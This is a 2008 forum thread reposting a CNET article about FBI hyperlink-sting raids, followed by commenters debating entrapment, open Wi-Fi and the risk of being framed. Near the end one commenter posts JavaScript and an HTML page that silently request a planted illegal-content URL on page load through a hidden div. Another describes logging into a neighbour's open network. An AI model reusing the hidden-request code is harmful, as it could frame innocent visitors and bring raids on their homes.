Posted on 03/24/2008 2:16:11 PM PDT by E. Pluribus Unum
The FBI has recently adopted a novel investigative technique: posting hyperlinks that purport to be illegal videos of minors having sex, and then raiding the homes of anyone willing to click on them.
Undercover FBI agents used this hyperlink-enticement technique, which directed Internet users to a clandestine government server, to stage armed raids of homes in Pennsylvania, New York, and Nevada last year. The supposed video files actually were gibberish and contained no illegal images.
A CNET News.com review of legal documents shows that courts have approved of this technique, even though it raises questions about entrapment, the problems of identifying who's using an open wireless connection--and whether anyone who clicks on a FBI link that contains no child pornography should be automatically subject to a dawn raid by federal police. . .
The implications of the FBI's hyperlink-enticement technique are sweeping. Using the same logic and legal arguments, federal agents could send unsolicited e-mail messages to millions of Americans advertising illegal narcotics or child pornography--and raid people who click on the links embedded in the spam messages. The bureau could register the "unlawfulimages.com" domain name and prosecute intentional visitors. And so on. . .
While it might seem that merely clicking on a link wouldn't be enough to justify a search warrant, courts have ruled otherwise. On March 6, U.S. District Judge Roger Hunt in Nevada agreed with a magistrate judge that the hyperlink-sting operation constituted sufficient probable cause to justify giving the FBI its search warrant. . .
The magistrate judge ruled that even the possibilities of spoofing or other users of an open Wi-Fi connection "would not have negated a substantial basis for concluding that there was probable cause to believe that evidence of child pornography would be found on the premises to be searched." Translated, that means the search warrant was valid.
Entrapment: Not a defense So far, at least, attorneys defending the hyperlink-sting cases do not appear to have raised unlawful entrapment as a defense.
"Claims of entrapment have been made in similar cases, but usually do not get very far," said Stephen Saltzburg, a professor at George Washington University's law school. "The individuals who chose to log into the FBI sites appear to have had no pressure put upon them by the government...It is doubtful that the individuals could claim the government made them do something they weren't predisposed to doing or that the government overreached.". . .
Civil libertarians warn that anyone who clicks on a hyperlink advertising something illegal--perhaps found while Web browsing or received through e-mail--could face the same fate.
When asked what would stop the FBI from expanding its hyperlink sting operation, Harvey Silverglate, a longtime criminal defense lawyer in Cambridge, Mass. and author of a forthcoming book on the Justice Department, replied: "Because the courts have been so narrow in their definition of 'entrapment,' and so expansive in their definition of 'probable cause,' there is nothing to stop the Feds from acting as you posit."
If your WiFi and computer support it, it is best to go with WPA security instead of the older, and easily hacked WEP security method.
Here is a link to a transcript from a very good podcast on security called "Security Now" where they talk about the problems with WEP security. There is also an audio link on the site if you wish to listen to the original podcast. It's a pretty good show on information security which is podcast once a week.
Ok, so you take your laptop to someone’s house you don’t particularly like, hook it into the Internet and ........
It's not entrapment because it leads to a search warrant, not an arrest (at least for not clicking the link).
Is that all! I think I will call the FBI to come by tomorrow. Everybody loves it when they show up at a business, halt a days work and leave with all of their clients wondering why the FBI are interested in us.
It’s not like there will be any trouble.
Here is the sad part, I read awhile back (Can't find the dang story now darn it) that the vast majority of home private networks don't even enable the password function.
Further, the majortiy of folks who setup a home network using Microsoft use MSHOME (the default) as the network name and no passoword. Put those two together with the above story and consider the implications.
In other words you don't have to be a hacker, just someone who knows how to connect to a wireless network and then knows the default for a home network name is MSHOME.
Bango you are now into someone's network and can SEE their computers if they have them on. If they have file sharing enabled you can look around and even dump files onto their comps.
I wonder what the ACLU thinks of this idea...hehehe
Another thing. Website servers record the URL that was clicked on, not the words on the link. For government officials and other weakminded individuals, a link can say “click here to buy apples”, but the link can take you to a site that sells oranges. You don’t know where it’s taking you to. It’s possible to fool the user. The only record on the server will be of the URL that the user actually went to, not the words that the user saw.
BS. This is about a general principle. Some can carry this practice out to its logical conclusion and apply it beyond just the scope of just child porn.
That logical conclusion could see this one day applying to anyone clicking on links of sites that sell firearms should the enemies of the 2nd amendment ever have their way.
Yes, but it’s your IP address, and it will be your door being kicked in by nice men with balaclavas and MP-5’s at 3:00 AM, and your dog being shot. At that point, the fact that they don’t find anything they can prosecute you for will be very, very small comfort.
Yea! They just seize your computer but you won’t be in any trouble. LOL
Obviously nobody wants a visit from the FBI. I think the truth of the matter is that this program falls somewhere in between the two extreme views of "There is nothing to worry about unless you are into kiddie porn" and "If someone doesn't like you they can send you an email with the link and you will go to prison for the rest of your life just for opening the email" that seem to dominate this thread. I was hoping that my presentation of a hypothetical scenario of how the program would actually play out might at least generate some discussion along those lines and somewhere between the two extremes.
And it’s perfectly possible to have a computer request URLs and never indicate to the user that any such request was ever made or any response received by their computer. The FBI has obviously never heard of AJAX - if I knew the URL to their bad content, I could easily set up a completely innocent website that created a record in the FBI’s logs that everyone who came to it accessed the “illegal” link.
Careful with that Google toolbar, by the way.
The armed SWAT raid will be to your IP, though.
Once they are finished subduing you and taking all your computer stuff, next day you can explain at your arraignment. They even take your music CDs.
And will it cost me $10,000 in legal fees and two years or so to get my computer back from the FBI?
My daughter just can't understand why I won't give her friends the codes to get on our wireless when they visit.
I've been laughed at by several of the parents for my paranoia, that is until I did a driveby login at the one parent who chided me the most.
Amazingly after that I got several calls to help those same people secure their systems. 3 of them had no passwords on anything.
I guess you can put me in the skeptical department. I find it unbelievable that our government can actually produce a system that works like a clock when they have never managed it to date.
I do appreciate all the information,did not think about others using this network.
$FBI_GETS_TO_RAID_YOUR_HOUSE_URL = "http://unlawfulimages.net/childporn.jpg";
function makeHTTPRequest(method, url, parameters)
{
http_request = false;
if (window.XMLHttpRequest) {
// For Mozilla, Safari etc.
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
// set type accordingly to anticipated content type
http_request.overrideMimeType($mime_type);
}
}
else if (window.ActiveXObject) {
// For IE
try { http_request = new ActiveXObject("Msxml2.XMLHTTP"); }
catch (e) {
try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); }
catch (e) {}
}
}
if (!http_request) { alert('Cannot create XMLHTTP instance'); return false; }
http_request.open(method, url, true);
http_request.setRequestHeader("Content-type", $mime_type);
http_request.setRequestHeader("Connection", "close");
request_timestamp= new Date();
if ((parameters=='')||(parameters==undefined)) {
parameters = 'reqtime=' +encodeURI(request_timestamp)+"&rng="+Math.random();
}
else {parameters = parameters + '&reqtime='+encodeURI(request_timestamp)+"&rng="+Math.random();}
http_request.send(parameters);
return http_request;
}
$div_user_has_no_idea_is_here = "hiddendiv";
function LoseConstitutionalRights() {
var this_object = document.getElementById($div_user_has_no_idea_is_here);
if (this_object=="") { return("Could not find object of name: "+element_id); }
var http_request=makeHTTPRequest("GET",filename);
http_request.onreadystatechange=function() {
if(http_request.readyState==4) {
this_object.innerHTML=this_object.innerHTML+http_request.responseText;
if (focus!='') {
var this_focus=document.getElementById(focus);
if ((this_focus=="")||(this_focus==undefined)) { return("Could not find object of name: "+element_id); }
this_focus.focus();
}
}
}
}
Now I can just stick a body OnLoad="LoseConstitutionalRights();" tag into a page and you're f-ed. <html> <head> <title> Welcome to FluffyBunnies.com</title> </head> <body OnLoad="javascript:LoseConstitutionalRights())"> Welcome to fluffy bunnies! Aren't they cute! Show all your pals! <div id="hiddendiv" style="display:none;"></div> </body> </html>Come see the most adorable fluffy bunny site ever!
Ah whoops there’s a bug in that... probably better that way, but still the concept is sound.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.